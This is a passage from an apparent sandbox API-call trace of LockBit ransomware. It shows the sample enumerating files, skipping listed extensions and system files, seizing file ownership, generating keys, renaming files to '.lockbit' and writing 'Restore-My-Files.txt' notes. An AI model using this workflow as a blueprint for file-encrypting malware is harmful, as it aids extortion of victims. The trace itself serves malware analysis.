lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0093.259] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Passport_PAL.wmv") returned 1 [0093.259] lstrcmpiW (lpString1="ntldr", lpString2="Passport_PAL.wmv") returned -1 [0093.259] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Passport_PAL.wmv") returned -1 [0093.259] lstrcmpiW (lpString1="bootsect.bak", lpString2="Passport_PAL.wmv") returned -1 [0093.259] lstrcmpiW (lpString1="autorun.inf", lpString2="Passport_PAL.wmv") returned -1 [0093.259] lstrcmpiW (lpString1="thumbs.db", lpString2="Passport_PAL.wmv") returned 1 [0093.259] lstrcmpiW (lpString1="iconcache.db", lpString2="Passport_PAL.wmv") returned -1 [0093.259] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.259] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned=".wmv" [0093.259] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0093.260] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0093.260] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0093.261] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0093.261] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0093.261] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0093.261] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0093.261] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0093.261] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv.lockbit") returned 76 [0093.261] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.263] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.265] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.265] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.266] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.267] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.267] RtlFreeAnsiString (AnsiString="\\") [0093.267] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0093.268] malloc (_Size=0x200) returned 0x77d800 [0093.268] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.268] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.268] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.268] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.269] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.269] CloseHandle (hObject=0x1194) returned 1 [0093.269] free (_Block=0x77d800) [0093.269] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0093.269] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.269] malloc (_Size=0x40068) returned 0x3e30078 [0093.272] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=109292) returned 1 [0093.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0093.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0093.277] ReadFile (in: hFile=0x1194, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0093.287] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.287] malloc (_Size=0xae) returned 0x77d800 [0093.287] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0x0 [0093.287] free (_Block=0x77d800) [0093.287] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.288] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.288] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.288] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72538f74, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72538f74, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18337, dwReserved0=0x0, dwReserved1=0x0, cFileName="play-background.png", cAlternateFileName="")) returned 1 [0093.288] lstrcmpiW (lpString1=".", lpString2="play-background.png") returned -1 [0093.288] lstrcmpiW (lpString1="..", lpString2="play-background.png") returned -1 [0093.288] PathFindExtensionW (pszPath="play-background.png") returned=".png" [0093.288] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0093.288] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0093.288] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0093.288] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0093.288] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0093.288] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0093.288] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0093.288] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0093.288] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0093.288] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0093.289] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0093.289] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0093.289] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0093.289] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0093.289] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0093.290] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0093.290] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0093.290] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0093.290] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0093.290] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0093.290] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0093.290] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="play-background.png") returned 1 [0093.290] lstrcmpiW (lpString1="ntldr", lpString2="play-background.png") returned -1 [0093.290] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="play-background.png") returned -1 [0093.291] lstrcmpiW (lpString1="bootsect.bak", lpString2="play-background.png") returned -1 [0093.291] lstrcmpiW (lpString1="autorun.inf", lpString2="play-background.png") returned -1 [0093.291] lstrcmpiW (lpString1="thumbs.db", lpString2="play-background.png") returned 1 [0093.291] lstrcmpiW (lpString1="iconcache.db", lpString2="play-background.png") returned -1 [0093.291] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.291] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png") returned=".png" [0093.291] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0093.291] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0093.291] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0093.291] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0093.292] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0093.292] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0093.292] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0093.292] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0093.292] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0093.292] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0093.292] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0093.292] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0093.292] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png.lockbit") returned 79 [0093.292] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\play-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.294] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.296] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.296] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.298] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.299] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.299] RtlFreeAnsiString (AnsiString="\\") [0093.299] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13e0) returned 0x0 [0093.300] malloc (_Size=0x200) returned 0x77d800 [0093.300] NtQueryInformationToken (in: TokenHandle=0x13e0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.300] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.300] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.300] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.301] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.301] CloseHandle (hObject=0x13e0) returned 1 [0093.301] free (_Block=0x77d800) [0093.301] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\play-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e0 [0093.302] CreateIoCompletionPort (FileHandle=0x13e0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.302] malloc (_Size=0x40068) returned 0x3e700e8 [0093.304] GetFileSizeEx (in: hFile=0x13e0, lpFileSize=0x3e70100 | out: lpFileSize=0x3e70100*=99127) returned 1 [0093.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb011c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb011c) returned 0x0 [0093.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.310] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb012c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb012c) returned 0x0 [0093.333] ReadFile (in: hFile=0x13e0, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 0x0 [0093.341] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.341] malloc (_Size=0xb4) returned 0x3e70008 [0093.341] NtSetInformationFile (FileHandle=0x13e0, IoStatusBlock=0x3d6aa8c, FileInformation=0x3e70008, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0093.342] free (_Block=0x3e70008) [0093.342] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.342] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.342] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.342] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72512e17, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72512e17, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="selection_subpicture.png", cAlternateFileName="")) returned 1 [0093.342] lstrcmpiW (lpString1=".", lpString2="selection_subpicture.png") returned -1 [0093.343] lstrcmpiW (lpString1="..", lpString2="selection_subpicture.png") returned -1 [0093.343] PathFindExtensionW (pszPath="selection_subpicture.png") returned=".png" [0093.343] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0093.343] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0093.343] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0093.343] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0093.344] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0093.344] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0093.344] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0093.344] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0093.344] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0093.344] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0093.344] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0093.344] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.344] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0093.345] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="selection_subpicture.png") returned -1 [0093.345] lstrcmpiW (lpString1="ntldr", lpString2="selection_subpicture.png") returned -1 [0093.345] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="selection_subpicture.png") returned -1 [0093.345] lstrcmpiW (lpString1="bootsect.bak", lpString2="selection_subpicture.png") returned -1 [0093.345] lstrcmpiW (lpString1="autorun.inf", lpString2="selection_subpicture.png") returned -1 [0093.345] lstrcmpiW (lpString1="thumbs.db", lpString2="selection_subpicture.png") returned 1 [0093.345] lstrcmpiW (lpString1="iconcache.db", lpString2="selection_subpicture.png") returned -1 [0093.345] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.345] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png") returned=".png" [0093.345] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0093.345] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0093.345] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0093.345] lstrcmpiW 